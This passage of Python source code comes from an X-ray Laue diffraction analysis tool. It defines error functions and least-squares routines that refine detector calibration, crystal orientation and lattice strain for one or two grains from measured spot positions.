mat3 = np.array([[np.cos(a3), -np.sin(a3), 0],
[np.sin(a3), np.cos(a3), 0],
[0, 0, 1]])
deltamat = np.dot(mat3, np.dot(mat2, mat1))
# building B mat
varyingstrain = np.array([[1.0, param_strain[2], param_strain[3]],
[0, param_strain[0], param_strain[4]],
[0, 0, param_strain[1]]])
newmatrix = np.dot(np.dot(deltamat, initrot), varyingstrain)
# # three last parameters are orientation angles in quaternion expression and are here not used
# varying_parameter_value = array(allparameters[:5])
# arr_indexvaryingparameters = arr_indexvaryingparameters [arr_indexvaryingparameters < 5]
# varying_parameter_value: array of value that will be taken into account
# xy_from_Quat only uses 5 detector calibration parameter
# fitting_param: index of position of varying parameters in allparameters array
# allparameters: array of 8 elements: 5 first of calibration parameters and 3 of angles defining quaternion
patchallparam = allparameters.tolist()
# 5 detector parameters + 3 angles + 5 strain components
ally = np.array(patchallparam[:5] + [0, 0, 0] + patchallparam[5:])
if 2 in arr_indexvaryingparameters:
ally[2]=param_strain[-1]
# because elem 5 to 7 are used in quaternion calculation
# TODO : correct also strain calib in the same manner
X, Y, _, _ = xy_from_Quat(allparameters[:5],
DATA_Q,
nspots,
np.arange(5),
ally,
initrot=newmatrix,
vecteurref=Bmat,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((X - pixX) ** 2 + (Y - pixY) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
if verbose:
# if weights is not None:
# print("***********mean weighted pixel deviation ", np.mean(distanceterm), " ********")
# else:
# print("***********mean pixel deviation ", np.mean(distanceterm), " ********")
# print "newmatrix", newmatrix
return distanceterm, deltamat, newmatrix
else:
return distanceterm
def error_function_strain_with_two_orientations(param_strain, DATA_Q, allparameters,
arr_indexvaryingparameters, nspots, pixX, pixY,
initrot=IDENTITYMATRIX,
Bmat=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None):
"""
#All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with nspots (array of indices)
# allparameters must contain 5 detector calibration parameters + 5 parameters of strain + 3 angles of elementary rotation
# param_strain must contain values of one or many parameters of allparameters
#
# strain = param_strain[:5]
# deltaangles = param_strain[5:8]
# arr_indexvaryingparameters = array of position of parameters whose values are in param_strain
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9]) for only fit strain without orientation refinement
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9, 10,11,12, 13,14,15]) for strain AND orientation refinement
# in this function calibration is not refined (but values are needed!), arr_indexvaryingparameters must only contain index >= 5
TODO: not implemented for transmission geometry (kf_direction='X>0') and backreflection ('X<0')
.. warning::
not completed !
"""
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
# arr_indexvaryingparameters = [5,6,7,8,9,10,11,12] first 5 params for strain and 6 last for misorientation of two grains
index_of_rot_in_arr_indexvaryingparameters_1 = [10, 11, 12]
index_of_rot_in_arr_indexvaryingparameters_2 = [13, 14, 15]
if index_of_rot_in_arr_indexvaryingparameters_1[0] in arr_indexvaryingparameters:
ind1 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters_1[0])[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_strain[ind1] * DEG
else:
a1 = param_strain[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)],
[0, 1, 0],
[-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters_1[1] in arr_indexvaryingparameters:
ind2 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters_1[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_strain[ind2] * DEG
else:
a2 = param_strain[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0],
[0, np.cos(a2), np.sin(a2)],
[0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters_1[2] in arr_indexvaryingparameters:
ind3 = np.where(
arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters_1[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_strain[ind3] * DEG
else:
a3 = param_strain[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0],
[np.sin(a3), np.cos(a3), 0],
[0, 0, 1]])
deltamat_1 = np.dot(mat3, np.dot(mat2, mat1))
if index_of_rot_in_arr_indexvaryingparameters_2[0] in arr_indexvaryingparameters:
ind1 = np.where(
arr_indexvaryingparameters
== index_of_rot_in_arr_indexvaryingparameters_2[0]
)[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = param_strain[ind1] * DEG
else:
a1 = param_strain[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array([[np.cos(a1), 0, np.sin(a1)],
[0, 1, 0],
[-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters_2[1] in arr_indexvaryingparameters:
ind2 = np.where(
arr_indexvaryingparameters
== index_of_rot_in_arr_indexvaryingparameters_2[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = param_strain[ind2] * DEG
else:
a2 = param_strain[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array([[1, 0, 0],
[0, np.cos(a2), np.sin(a2)],
[0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters_2[2] in arr_indexvaryingparameters:
ind3 = np.where(
arr_indexvaryingparameters
== index_of_rot_in_arr_indexvaryingparameters_2[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = param_strain[ind3] * DEG
else:
a3 = param_strain[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0], [np.sin(a3), np.cos(a3), 0], [0, 0, 1]])
deltamat_2 = np.dot(mat3, np.dot(mat2, mat1))
# building B mat
varyingstrain = np.array(
[[1.0, param_strain[2], param_strain[3]],
[0, param_strain[0], param_strain[4]],
[0, 0, param_strain[1]]])
newmatrix_1 = np.dot(np.dot(deltamat_1, initrot), varyingstrain)
newmatrix_2 = np.dot(np.dot(deltamat_2, initrot), varyingstrain)
# # three last parameters are orientation angles in quaternion expression and are here not used
# varying_parameter_value = array(allparameters[:5])
# arr_indexvaryingparameters = arr_indexvaryingparameters [arr_indexvaryingparameters < 5]
# varying_parameter_value: array of value that will be taken into account
# xy_from_Quat only uses 5 detector calibration parameter
# fitting_param: index of position of varying parameters in allparameters array
# allparameters: array of 8 elements: 5 first of calibration parameters and 3 of angles defining quaternion
patchallparam = allparameters.tolist()
# 5 det parameters + 3 small rotations + 5 strain parameters
ally_1 = np.array(patchallparam[:5] + [0, 0, 0] + patchallparam[5:])
# because elem 5 to 7 are used in quaternion calculation
# TODO : correct also strain calib in the same manner
X1, Y1, _, _ = xy_from_Quat(allparameters[:5],
DATA_Q,
nspots,
np.arange(5),
ally_1,
initrot=newmatrix_1,
vecteurref=Bmat,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim)
distanceterm1 = np.sqrt((X1 - pixX) ** 2 + (Y1 - pixY) ** 2)
# 5 det parameters + 3 small rotations + 5 strain parameters
ally_2 = np.array(patchallparam[:5] + [0, 0, 0] + patchallparam[5:])
# because elem 5 to 7 are used in quaternion calculation
# TODO : correct also strain calib in the same manner
X2, Y2, _, _ = xy_from_Quat(allparameters[:5],
DATA_Q,
nspots,
np.arange(5),
ally_2,
initrot=newmatrix_2,
vecteurref=Bmat,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim)
distanceterm2 = np.sqrt((X2 - pixX) ** 2 + (Y2 - pixY) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm2 * weights / allweights
# print "**mean weighted distanceterm ",mean(distanceterm)," ********"
# print "**mean distanceterm ",mean(distanceterm)," ********"
if verbose:
# if weights is not None:
# print("***********mean weighted pixel deviation ", np.mean(distanceterm), " ********")
# else:
# print("***********mean pixel deviation ", np.mean(distanceterm), " ********")
return distanceterm2, (deltamat_1, deltamat_2), (newmatrix_1, newmatrix_2)
else:
return distanceterm
def fit_on_demand_strain(starting_param,
miller,
allparameters,
_error_function_on_demand_strain,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
Bmat=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
fitycen=False,
**kwd):
"""
To use it:
allparameters = 5calibdetectorparams + fivestrainparameter + 3deltaangles of orientations
starting_param = [fivestrainparameter + 3deltaangles of orientations] = [1,1,0,0,0,0,0,0] typically
arr_indexvaryingparameters = range(5,13)
"""
# All miller indices must be entered in miller, selection is done in xy_from_Quat with nspots (array of indices)
parameters = ["dd", "xcen", "ycen", "angle1", "angle2", "b/a", "c/a",
"a12", "a13", "a23", "theta1", "theta2", "theta3", ]
parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
param_strain_0 = starting_param
# print('\n\nstarting_param',starting_param)
if verbose:
# print("\n\n***************************\nfirst error with initial values of:",
# parameters_being_fitted, " \n\n***************************\n")
_error_function_on_demand_strain(param_strain_0,
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
Bmat=Bmat,
pureRotation=pureRotation,
verbose=0,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n***************************\nFitting parameters: ",
# parameters_being_fitted,
# "\n\n***************************\n")
# # NEEDS AT LEAST 5 spots (len of nspots)
# print("With initial values", param_strain_0)
# setting keywords of _error_function_on_demand_strain during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_strain.__defaults__ = (initrot,
Bmat,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction)
# LEASTSQUARE
res = leastsq(_error_function_on_demand_strain,
param_strain_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
#--------------------- other least square ------------------
# For ycen fitting together strain component, changing ycen scale is useful
# x_scale = [1,1,1,1,.1,1,1,1] 1 except for xgam .1
xscale = np.ones(len(arr_indexvaryingparameters))
try:
xscale[-1] = 100
except ValueError:
pass
if 0:
#------------------------
# from scipy.optimize import leastsq, least_squares
calib_sol2 = least_squares(_error_function_on_demand_strain,
param_strain_0,
args=(miller, allparameters, arr_indexvaryingparameters, nspots, pixX, pixY),
tr_solver = 'exact',
x_scale=xscale, max_nfev=None)
# print("\nLEAST_SQUARES")
# #print("calib_sol2", calib_sol2['x'])
# print(calib_sol2['x'])
# print('mean residues', np.mean(calib_sol2['fun']))
#return calib_sol2['x']
#--------------------- other least square ------------------
strain_sol = res[0]
# print("code results", res[-1])
# print("nb iterations", res[2]["nfev"])
# print("mesg", res[-2])
# if verbose:
# print("strain_sol", strain_sol)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_on_demand_strain(strain_sol,
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
Bmat=Bmat,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
return strain_sol
def plot_refinement_oneparameter(starting_param,
miller,
allparameters,
_error_function_on_demand_calibration,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
param_range,
initrot=IDENTITYMATRIX,
vecteurref=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
All miller indices must be entered in miller,
selection is done in xy_from_Quat with nspots (array of indices)
"""
parameters = ["distance (mm)", "Xcen (pixel)", "Ycen (pixel)",
"Angle1 (deg)", "Angle2 (deg)", "theta1", "theta2", "theta3"]
# parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
param_calib_0 = starting_param
mini, maxi, nbsteps = param_range
# setting keywords of _error_function_on_demand_calibration during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_calibration.__defaults__ = (initrot,
vecteurref,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction)
# designed for rotation angle
res = []
for angle in np.linspace(mini, maxi, nbsteps) + param_calib_0:
residues = _error_function_on_demand_calibration(np.array([angle]),
miller,
allparameters,
arr_indexvaryingparameters,
nspots,
pixX,
pixY,
initrot=initrot,
vecteurref=vecteurref,
pureRotation=pureRotation,
verbose=0,
pixelsize=pixelsize,
weights=weights,
kf_direction=kf_direction)
# print "mean(residues)",mean(residues)
res.append([angle, np.mean(residues)])
return res
def error_function_XCEN(param_calib,
DATA_Q,
allparameters,
nspots,
pixX,
pixY,
initrot=IDENTITYMATRIX,
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048):
"""
seems to be useless ?
"""
# All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with nspots (array of indices)
# param_orient is three elements array representation of quaternion
X, Y, _, R = xy_from_Quat(param_calib,
DATA_Q,
nspots,
np.arange(8)[1],
allparameters,
initrot=initrot,
pureRotation=pureRotation,
labXMAS=0,
verbose=verbose,
pixelsize=pixelsize)
distanceterm = np.sqrt((X - pixX) ** 2 + (Y - pixY) ** 2)
# print "**mean distanceterm ",mean(distanceterm)," ********"
if verbose:
# print("X", X)
# print("pixX", pixX)
# print("Y", Y)
# print("pixY", pixY)
# print("param_orient", param_calib)
# print("distanceterm", distanceterm)
# print("\n*****************\n\nmean distanceterm ", np.mean(distanceterm), " ********\n")
return distanceterm, R
else:
return distanceterm
def fitXCEN(starting_param,
miller,
allparameters,
_error_function_XCEN,
nspots,
pixX,
pixY,
initrot=np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1.0]]),
pureRotation=1,
verbose=0,
pixelsize=165.0 / 2048,
**kwd):
"""
#All miller indices must be entered in miller,
selection is done in xy_from_Quat with nspots (array of indices)
"""
param_calib_0 = starting_param
if verbose:
# print("\n\n***************************\nfirst error XCEN************************\n")
_error_function_XCEN(param_calib_0,
miller,
allparameters,
nspots,
pixX,
pixY,
initrot=initrot,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize)
# print("\n\n***************************\nFitting XCEN ...\n\n***************************\n")
# print("Starting parameters", param_calib_0)
# setting keywords of _error_function_XCEN during the fitting because leastsq handle only *args but not **kwds
_error_function_XCEN.__defaults__ = (initrot, pureRotation, 0, pixelsize)
calib_sol = leastsq(_error_function_XCEN,
param_calib_0,
args=(miller, allparameters, nspots, pixX, pixY),
**kwd) # args=(rre,ertetr,) last , is important!
# print("calib_sol", calib_sol)
if calib_sol[-1] in (1, 2, 3, 4, 5):
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_XCEN(calib_sol[0],
miller,
allparameters,
nspots,
pixX,
pixY,
initrot=initrot,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize)
return calib_sol[0] # 5 detector parameters
else:
return None
def fit_on_demand_strain_2grains(starting_param,
miller,
allparameters,
_error_function_on_demand_strain_2grains,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
Fit a model of two grains of the same material
Initial orientation matrices are the same (only strain state differs)
To use it:
allparameters = 5calibdetectorparams + fivestrainparameters_g1 + 3deltaangles_g1 of orientations
+ fivestrainparameters_g2 + 3deltaangles_g2 of orientations
starting_param = [fivestrainparameter + 3deltaangles of orientations] = [1,1,0,0,0,0,0,0]+[1,1,0,0,0,0,0,0] typically
arr_indexvaryingparameters = range(5,21)
B0matrix : B0 matrix defining a*,b*,c* basis vectors (in columns) in initial orientation / LT frame
"""
# All miller indices must be entered in miller
# selection is done in xy_from_Quat with absolutespotsindices (array of indices)
parameterscalib = ["dd", "xcen", "ycen", "angle1", "angle2"]
strain_g1 = ["b/a", "c/a", "a12", "a13", "a23"]
rot_g1 = ["theta1", "theta2", "theta3"]
strain_g2 = ["b/a", "c/a", "a12", "a13", "a23"]
parameters = parameterscalib + strain_g1 + rot_g1 + strain_g2
parameters_being_fitted = [parameters[k] for k in arr_indexvaryingparameters]
init_strain_values = starting_param
if verbose:
# print("\n\n***************************\nfirst error with initial values of:",
# parameters_being_fitted, " \n\n***************************\n")
_error_function_on_demand_strain_2grains(init_strain_values,
miller,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=initrot,
B0matrix=B0matrix,
nb_grains=nb_grains,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n***************************\nFitting parameters: ",
# parameters_being_fitted, "\n\n***************************\n")
# # NEEDS AT LEAST 5 spots (len of nspots)
# print("With initial values", init_strain_values)
# setting keywords of _error_function_on_demand_strain during the fitting because leastsq handle only *args but not **kwds
_error_function_on_demand_strain_2grains.__defaults__ = (initrot,
B0matrix,
nb_grains,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_on_demand_strain_2grains,
init_strain_values,
args=(
miller,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY), # args=(rre,ertetr,) last , is important!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
strain_sol = res[0]
# print "res", res
# print "code results", res[-1]
# print("nb iterations", res[2]["nfev"])
# if verbose:
# print("strain_sol", strain_sol)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if verbose:
# print("\n\n ************** End of Fitting - Final errors ****************** \n\n")
_error_function_on_demand_strain_2grains(strain_sol,
miller,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=initrot,
B0matrix=B0matrix,
nb_grains=nb_grains,
pureRotation=pureRotation,
verbose=verbose,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True)
return strain_sol
def error_function_on_demand_strain_2grains(varying_parameters_values,
DATA_Q,
allparameters,
arr_indexvaryingparameters,
absolutespotsindices,
pixX,
pixY,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
compute array of errors of weight*((Xtheo-pixX)**2+(Ytheo-pixY)**2) for each pears
Xtheo, Ytheo derived from kf and q vector: q = UB Bmat B0 G* where G* =[h ,k, l] vector
Bmat is the displacements matrix strain = Bmat-Id
#All miller indices must be entered in DATA_Q, selection is done in xy_from_Quat with absolutespotsindices (array of indices)
# allparameters must contain 5 detector calibration parameters + 5 parameters_g1 of strain + 3 angles_g1 of elementary rotation
# + 5 parameters_g2 of strain
# varying_parameters_values must contain values of one or many parameters of allparameters
#
# strain_g1 = varying_parameters_values[:5]
strain_g2 = varying_parameters_values[8:13]
# deltaangles_g1 = varying_parameters_values[5:8]
# arr_indexvaryingparameters = array of position of parameters whose values are in varying_parameters_values
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9]) for only fit g1's strain without orientation refinement
# e.g.: arr_indexvaryingparameters = array([5,6,7,8,9, 10,11,12]) for g1's strain AND orientation refinement
# in this function calibration is not refined (but values are needed!), arr_indexvaryingparameters must only contain index >= 5
DATA_Q array of hkl vectors
pixX arrays of pixels exp. peaks X positions [Xs g1,Xs g2]
pixY arrays of pixels exp. peaks Y positions [Ys g1,Ys g2]
absolutespotsindices [absolutespotsindices g1, absolutespotsindices g2]
weights None or [weights g1, weight g2]
initrot = guessed UB orientation matrix
B0matrix B0 matrix defining a*,b*,c* basis vectors (in columns) in initial orientation / LT frame
TODO: ?? not implemented for transmission geometry (kf_direction='X>0') ? and backreflection ('X<0')
"""
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
rotationselements_indices = [[10, 11, 12],[18, 19, 20]] # with counting 5 calib parameters
strainelements_indices = [[5, 6, 7, 8, 9], [13, 14, 15, 16, 17]]
distances_vector_list = []
all_deltamatrices = []
all_newmatrices = []
for grain_index in list(range(nb_grains)):
mat1, mat2, mat3 = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
# arr_indexvaryingparameters = [5,6,7,8,9,10,11,12] first 5 params for strain and 3 last fro roatation
index_of_rot_in_arr_indexvaryingparameters = rotationselements_indices[grain_index]
if index_of_rot_in_arr_indexvaryingparameters[0] in arr_indexvaryingparameters:
ind1 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[0])[0][0]
if len(arr_indexvaryingparameters) > 1:
a1 = varying_parameters_values[ind1] * DEG
else:
a1 = varying_parameters_values[0] * DEG
# print "a1 (rad)= ",a1
mat1 = np.array(
[[np.cos(a1), 0, np.sin(a1)], [0, 1, 0], [-np.sin(a1), 0, np.cos(a1)]])
if index_of_rot_in_arr_indexvaryingparameters[1] in arr_indexvaryingparameters:
ind2 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[1])[0][0]
if len(arr_indexvaryingparameters) > 1:
a2 = varying_parameters_values[ind2] * DEG
else:
a2 = varying_parameters_values[0] * DEG
# print "a2 (rad)= ",a2
mat2 = np.array(
[[1, 0, 0], [0, np.cos(a2), np.sin(a2)], [0, np.sin(-a2), np.cos(a2)]])
if index_of_rot_in_arr_indexvaryingparameters[2] in arr_indexvaryingparameters:
ind3 = np.where(arr_indexvaryingparameters == index_of_rot_in_arr_indexvaryingparameters[2])[0][0]
if len(arr_indexvaryingparameters) > 1:
a3 = varying_parameters_values[ind3] * DEG
else:
a3 = varying_parameters_values[0] * DEG
mat3 = np.array([[np.cos(a3), -np.sin(a3), 0], [np.sin(a3), np.cos(a3), 0], [0, 0, 1]])
deltamat = np.dot(mat3, np.dot(mat2, mat1))
all_deltamatrices.append(deltamat)
# print("all_deltamatrices", all_deltamatrices)
# building Bmat ------------(triangular up matrix)
index_of_strain_in_arr_indexvaryingparameters = strainelements_indices[grain_index]
# print("arr_indexvaryingparameters", arr_indexvaryingparameters)
# print("varying_parameters_values", varying_parameters_values)
# default parameters
s_list = [1, 1, 0, 0, 0]
for s_index in list(range(5)):
if (
index_of_strain_in_arr_indexvaryingparameters[s_index]
in arr_indexvaryingparameters):
ind1 = np.where(
arr_indexvaryingparameters
== index_of_strain_in_arr_indexvaryingparameters[s_index]
)[0][0]
if len(arr_indexvaryingparameters) > 1:
s_list[s_index] = varying_parameters_values[ind1]
else: # handling fit with single fitting parameter
s_list[s_index] = varying_parameters_values[0]
s0, s1, s2, s3, s4 = s_list
varyingstrain = np.array([[1.0, s2, s3], [0, s0, s4], [0, 0, s1]])
newmatrix = np.dot(np.dot(deltamat, initrot), varyingstrain)
all_newmatrices.append(newmatrix)
# print "varyingstrain", varyingstrain
# print 'all_newmatrices', all_newmatrices
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
DATA_Q,
absolutespotsindices[grain_index],
UBmatrix=newmatrix,
B0matrix=B0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
Xexp = pixX[grain_index]
Yexp = pixY[grain_index]
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights[grain_index])
distanceterm = distanceterm * weights[grain_index] / allweights
# if verbose:
# print("** grain %d distance residues = " % grain_index,
# distanceterm, " ********")
# print("** grain %d mean distance residue = " % grain_index,
# np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
distances_vector_list.append(distanceterm)
# print 'len(distances_vector_list)', len(distances_vector_list)
if nb_grains == 2:
alldistances_array = np.hstack((distances_vector_list[0], distances_vector_list[1]))
if nb_grains == 1:
alldistances_array = distances_vector_list[0]
if verbose:
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ",
# np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.B0matrix matrices
return alldistances_array, all_deltamatrices, all_newmatrices
else:
return alldistances_array
def error_function_general(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
q = T_LT UzUyUz Ustart T_c B0 G*
Interface error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
q = T_LT UzUyUz Ustart T_c B0 G*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
possible keys for parameters to be refined are:
five detector frame calibration parameters:
detectordistance,xcen,ycen,beta, gamma
three misorientation angles with respect to LT orthonormal frame (x, y, z) matrices Ux, Uy,Uz:
anglex,angley,anglez
5 independent elements of a distortion operator
-[[Tc00,Tc01,Tc02],[Tc10,Tc11,Tc12],[Tc20,Tc21,Tc22]]
each column is the transformed reciprocal unit cell vector a*',b*' or c*' expressed in a*,b*,c* frame (reference reciprocal unit cell)
Usually Tc11, Tc22, Tc01,Tc02,Tc12 with Tc00=1 and the all others = 0 (matrix triangular up)
# TODO :- [[Td00,Td01,Td02],[Td10,Td11,Td12],[Td20,Td21,Td22]]
#
#each column is the transformed direct crystal unit cell vector a',b' or c' expressed in a,b,c frame (reference unit cell)
-[[T00,T01,T02],[T10,T11,T12],[T20,T21,T22]]
each column is the transformed LT frame vector x',y' or z' expressed in x,y,z frame
-[[Ts00,Ts01,Ts02],[Ts10,Ts11,Ts12],[Ts20,Ts21,Ts22]]
each column is the transformed sample frame vector xs',ys' or zs' expressed in xs,ys,zs frame
"""
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# print 'allparameters',allparameters
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
Tc = np.array(allparameters[8:17]).reshape((3, 3))
T = np.array(allparameters[17:26]).reshape((3, 3))
Ts = np.array(allparameters[26:35]).reshape((3, 3))
latticeparameters = np.array(allparameters[35:41])
sourcedepth = allparameters[41]
# print "Tc before", Tc
T_has_elements = False
Ts_has_elements = False
Tc_has_elements = False
latticeparameters_has_elements = False
nb_varying_parameters = len(varying_parameters_keys)
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = (varying_parameters_values_array[varying_parameter_index] * DEG)
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
if parameter_name is "angley":
Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
elif parameter_name is "anglex":
Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
elif parameter_name is "anglez":
Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif ((not T_has_elements) and (not Ts_has_elements) and parameter_name
in ("Tc00", "Tc01", "Tc02", "Tc10", "Tc11", "Tc12", "Tc20", "Tc21", "Tc22")):
# print 'got Tc elements: ', parameter_name
for i in list(range(3)):
for j in list(range(3)):
if parameter_name == "Tc%d%d" % (i, j):
# print "got parameter_name", parameter_name
if nb_varying_parameters > 1:
Tc[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Tc[i, j] = varying_parameters_values_array[0]
Tc_has_elements = True
elif (not Tc_has_elements and not Ts_has_elements and parameter_name
in ("T00", "T01", "T02", "T10", "T11", "T12", "T20", "T21", "T22")):
for i in list(range(3)):
for j in list(range(3)):
if parameter_name is "T%d%d" % (i, j):
if nb_varying_parameters > 1:
T[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
T[i, j] = varying_parameters_values_array[0]
T_has_elements = True
elif (not Tc_has_elements and not T_has_elements and parameter_name
in ("Ts00", "Ts01", "Ts02", "Ts10", "Ts11", "Ts12", "Ts20", "Ts21", "Ts22")):
for i in list(range(3)):
for j in list(range(3)):
if parameter_name is "Ts%d%d" % (i, j):
if nb_varying_parameters > 1:
Ts[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Ts[i, j] = varying_parameters_values_array[0]
Ts_has_elements = True
elif parameter_name in ("a", "b", "c", "alpha", "beta", "gamma"):
indparam = dict_lattice_parameters[parameter_name]
# if nb_varying_parameters > 1:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[varying_parameter_index] / factorscale)
# else:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[0] / factorscale)
